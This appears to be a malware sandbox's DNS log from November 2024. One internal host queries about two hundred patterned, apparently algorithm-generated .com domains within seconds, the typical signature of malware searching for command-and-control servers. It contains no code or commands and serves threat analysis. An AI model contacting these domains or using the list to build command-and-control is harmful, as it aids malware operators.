                                                                                                                                                                                                            Nov 11, 2024 18:07:53.404512882 CET192.168.2.91.1.1.10xcce4Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.434185028 CET192.168.2.91.1.1.10x523Standard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.435784101 CET192.168.2.91.1.1.10x94bcStandard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.435784101 CET192.168.2.91.1.1.10x5d36Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.436158895 CET192.168.2.91.1.1.10x3323Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.436158895 CET192.168.2.91.1.1.10x60a6Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.436913967 CET192.168.2.91.1.1.10xc9fdStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.436913967 CET192.168.2.91.1.1.10xf9c4Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437123060 CET192.168.2.91.1.1.10x69f8Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437341928 CET192.168.2.91.1.1.10x343aStandard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437539101 CET192.168.2.91.1.1.10x9723Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437720060 CET192.168.2.91.1.1.10xa9b7Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437720060 CET192.168.2.91.1.1.10xdc6eStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.437947035 CET192.168.2.91.1.1.10xffbaStandard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.438143015 CET192.168.2.91.1.1.10x4c1aStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.438143015 CET192.168.2.91.1.1.10xdadStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.438339949 CET192.168.2.91.1.1.10x10e2Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.439420938 CET192.168.2.91.1.1.10x45b2Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.463339090 CET192.168.2.91.1.1.10x659cStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.886495113 CET192.168.2.91.1.1.10x5b85Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.886495113 CET192.168.2.91.1.1.10xbd71Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.886764050 CET192.168.2.91.1.1.10x3c92Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.888612986 CET192.168.2.91.1.1.10x777eStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.889014006 CET192.168.2.91.1.1.10x2b74Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.890645981 CET192.168.2.91.1.1.10x59d8Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.890645981 CET192.168.2.91.1.1.10x2018Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.890954018 CET192.168.2.91.1.1.10xefaStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.891407967 CET192.168.2.91.1.1.10xcc49Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.893213987 CET192.168.2.91.1.1.10x5aaeStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.893975019 CET192.168.2.91.1.1.10xd0d4Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.894732952 CET192.168.2.91.1.1.10x8e3Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.895515919 CET192.168.2.91.1.1.10xfef0Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.895821095 CET192.168.2.91.1.1.10xbfebStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.898427963 CET192.168.2.91.1.1.10x46e3Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.898427963 CET192.168.2.91.1.1.10x855dStandard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.898602009 CET192.168.2.91.1.1.10x36b6Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.900242090 CET192.168.2.91.1.1.10xbe96Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.900343895 CET192.168.2.91.1.1.10xf506Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.901647091 CET192.168.2.91.1.1.10x23ffStandard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.917104006 CET192.168.2.91.1.1.10x9b0cStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.919317961 CET192.168.2.91.1.1.10x9519Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.919317961 CET192.168.2.91.1.1.10x940eStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.920629978 CET192.168.2.91.1.1.10xd8c0Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.920864105 CET192.168.2.91.1.1.10x25deStandard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.920957088 CET192.168.2.91.1.1.10x89c1Standard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921051025 CET192.168.2.91.1.1.10xf1d3Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921452999 CET192.168.2.91.1.1.10x12deStandard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921452999 CET192.168.2.91.1.1.10xabcStandard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921652079 CET192.168.2.91.1.1.10x284eStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921652079 CET192.168.2.91.1.1.10x1c78Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.921807051 CET192.168.2.91.1.1.10x8076Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.922195911 CET192.168.2.91.1.1.10xc911Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.928278923 CET192.168.2.91.1.1.10xabe6Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.937100887 CET192.168.2.91.1.1.10x52ccStandard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.947357893 CET192.168.2.91.1.1.10xa742Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.947357893 CET192.168.2.91.1.1.10x6394Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.947921991 CET192.168.2.91.1.1.10xbb8fStandard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.950098038 CET192.168.2.91.1.1.10xdd6cStandard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.957609892 CET192.168.2.91.1.1.10xe3f6Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.958574057 CET192.168.2.91.1.1.10xefb3Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.958870888 CET192.168.2.91.1.1.10xa53cStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.958870888 CET192.168.2.91.1.1.10xcc92Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.959147930 CET192.168.2.91.1.1.10xb8cbStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.959369898 CET192.168.2.91.1.1.10xa938Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.959464073 CET192.168.2.91.1.1.10xe338Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.959600925 CET192.168.2.91.1.1.10xb82cStandard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.972445011 CET192.168.2.91.1.1.10x59c4Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.975905895 CET192.168.2.91.1.1.10xd8ddStandard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.976638079 CET192.168.2.91.1.1.10x15f9Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.977515936 CET192.168.2.91.1.1.10xef72Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.977818012 CET192.168.2.91.1.1.10x40b7Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.978250980 CET192.168.2.91.1.1.10x4c1eStandard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.978646994 CET192.168.2.91.1.1.10xa9ceStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.978646994 CET192.168.2.91.1.1.10xd7f9Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.978921890 CET192.168.2.91.1.1.10xd58fStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.979137897 CET192.168.2.91.1.1.10xb86fStandard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.979137897 CET192.168.2.91.1.1.10x860aStandard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.980159044 CET192.168.2.91.1.1.10xc5a8Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.980422974 CET192.168.2.91.1.1.10x4688Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.980422974 CET192.168.2.91.1.1.10xfc84Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.981285095 CET192.168.2.91.1.1.10x9751Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.983869076 CET192.168.2.91.1.1.10x20c1Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:53.986504078 CET192.168.2.91.1.1.10x198dStandard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.995332003 CET192.168.2.91.1.1.10x9f34Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.998653889 CET192.168.2.91.1.1.10xf161Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.003607035 CET192.168.2.91.1.1.10x3f6cStandard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.003843069 CET192.168.2.91.1.1.10xb432Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.022525072 CET192.168.2.91.1.1.10x5d30Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.032644033 CET192.168.2.91.1.1.10x4eb6Standard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.038060904 CET192.168.2.91.1.1.10x82ceStandard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.066404104 CET192.168.2.91.1.1.10xe84eStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.077127934 CET192.168.2.91.1.1.10xe6a4Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.081779957 CET192.168.2.91.1.1.10xd31dStandard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.082173109 CET192.168.2.91.1.1.10x1efStandard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.082231045 CET192.168.2.91.1.1.10xc71fStandard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.084026098 CET192.168.2.91.1.1.10x92abStandard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.091166019 CET192.168.2.91.1.1.10x1be3Standard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.091845989 CET192.168.2.91.1.1.10xddb3Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.092341900 CET192.168.2.91.1.1.10x8106Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.092524052 CET192.168.2.91.1.1.10x50e5Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.105925083 CET192.168.2.91.1.1.10xeae5Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.107626915 CET192.168.2.91.1.1.10x8c63Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.107827902 CET192.168.2.91.1.1.10xc3e8Standard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.112977028 CET192.168.2.91.1.1.10x8b08Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.116408110 CET192.168.2.91.1.1.10xa614Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.120033979 CET192.168.2.91.1.1.10x7b93Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.121170998 CET192.168.2.91.1.1.10x2536Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.121366978 CET192.168.2.91.1.1.10x3d22Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.121557951 CET192.168.2.91.1.1.10x2218Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.123411894 CET192.168.2.91.1.1.10x2551Standard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.124214888 CET192.168.2.91.1.1.10xaeb5Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.126075983 CET192.168.2.91.1.1.10x8844Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.128083944 CET192.168.2.91.1.1.10x90f1Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.160188913 CET192.168.2.91.1.1.10xc1f0Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.160487890 CET192.168.2.91.1.1.10xdffbStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.161799908 CET192.168.2.91.1.1.10x951dStandard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.162111998 CET192.168.2.91.1.1.10xc8caStandard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.162333965 CET192.168.2.91.1.1.10xefc9Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.176315069 CET192.168.2.91.1.1.10x8f65Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.177494049 CET192.168.2.91.1.1.10x269Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.178355932 CET192.168.2.91.1.1.10x282aStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.178849936 CET192.168.2.91.1.1.10xffa7Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.179018974 CET192.168.2.91.1.1.10xe299Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.179182053 CET192.168.2.91.1.1.10xebb9Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.179440022 CET192.168.2.91.1.1.10x4feaStandard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.179578066 CET192.168.2.91.1.1.10xa32Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.179708004 CET192.168.2.91.1.1.10x2c72Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.179852962 CET192.168.2.91.1.1.10xa52dStandard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.179996967 CET192.168.2.91.1.1.10xbd3cStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.180414915 CET192.168.2.91.1.1.10xa7c7Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.180684090 CET192.168.2.91.1.1.10x1efcStandard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.213594913 CET192.168.2.91.1.1.10xf345Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.213848114 CET192.168.2.91.1.1.10xbaa7Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.224236012 CET192.168.2.91.1.1.10x83d3Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.224416971 CET192.168.2.91.1.1.10xb287Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.232422113 CET192.168.2.91.1.1.10xd1aeStandard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.232600927 CET192.168.2.91.1.1.10x1293Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.232737064 CET192.168.2.91.1.1.10xedfbStandard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.232861996 CET192.168.2.91.1.1.10x13afStandard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.232983112 CET192.168.2.91.1.1.10xc6b9Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.233124971 CET192.168.2.91.1.1.10x6127Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.233259916 CET192.168.2.91.1.1.10x8082Standard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.233388901 CET192.168.2.91.1.1.10x1dc3Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.234404087 CET192.168.2.91.1.1.10x85b2Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.236835003 CET192.168.2.91.1.1.10x48d4Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.401676893 CET192.168.2.91.1.1.10xf0e7Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.401993990 CET192.168.2.91.1.1.10x1079Standard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.704478979 CET192.168.2.91.1.1.10xeddaStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.707987070 CET192.168.2.91.1.1.10x9eafStandard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.714262962 CET192.168.2.91.1.1.10xadb5Standard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.715491056 CET192.168.2.91.1.1.10x9eb6Standard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.716598988 CET192.168.2.91.1.1.10x980aStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.723242998 CET192.168.2.91.1.1.10x5d43Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.756206989 CET192.168.2.91.1.1.10x2c67Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.762554884 CET192.168.2.91.1.1.10xb4c0Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.779014111 CET192.168.2.91.1.1.10x29beStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.863574028 CET192.168.2.91.1.1.10x2c7eStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.864334106 CET192.168.2.91.1.1.10x5d2aStandard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.865335941 CET192.168.2.91.1.1.10x9c03Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.865880013 CET192.168.2.91.1.1.10xd025Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.866316080 CET192.168.2.91.1.1.10x5152Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.867296934 CET192.168.2.91.1.1.10x82b1Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.868386984 CET192.168.2.91.1.1.10xd764Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.868834972 CET192.168.2.91.1.1.10x4260Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.869760036 CET192.168.2.91.1.1.10xcd4aStandard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.870584011 CET192.168.2.91.1.1.10x74e7Standard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.870613098 CET192.168.2.91.1.1.10x3941Standard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.872806072 CET192.168.2.91.1.1.10x4c3dStandard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.873115063 CET192.168.2.91.1.1.10x92bfStandard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.873538017 CET192.168.2.91.1.1.10x6a4fStandard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.873697042 CET192.168.2.91.1.1.10xc78bStandard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.874290943 CET192.168.2.91.1.1.10x29f7Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.874577999 CET192.168.2.91.1.1.10xebf6Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.893274069 CET192.168.2.91.1.1.10xa3dbStandard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.893455029 CET192.168.2.91.1.1.10x3fdbStandard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.893631935 CET192.168.2.91.1.1.10x3c37Standard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.893810034 CET192.168.2.91.1.1.10xb6afStandard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.894004107 CET192.168.2.91.1.1.10xe351Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.894154072 CET192.168.2.91.1.1.10x853eStandard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.894325972 CET192.168.2.91.1.1.10xb592Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.894454956 CET192.168.2.91.1.1.10xd7d0Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.899431944 CET192.168.2.91.1.1.10x1c7bStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:07:55.899609089 CET192.168.2.91.1.1.10xb098Standard query (0)pujytug.comA (IP address)IN (0x0001)false
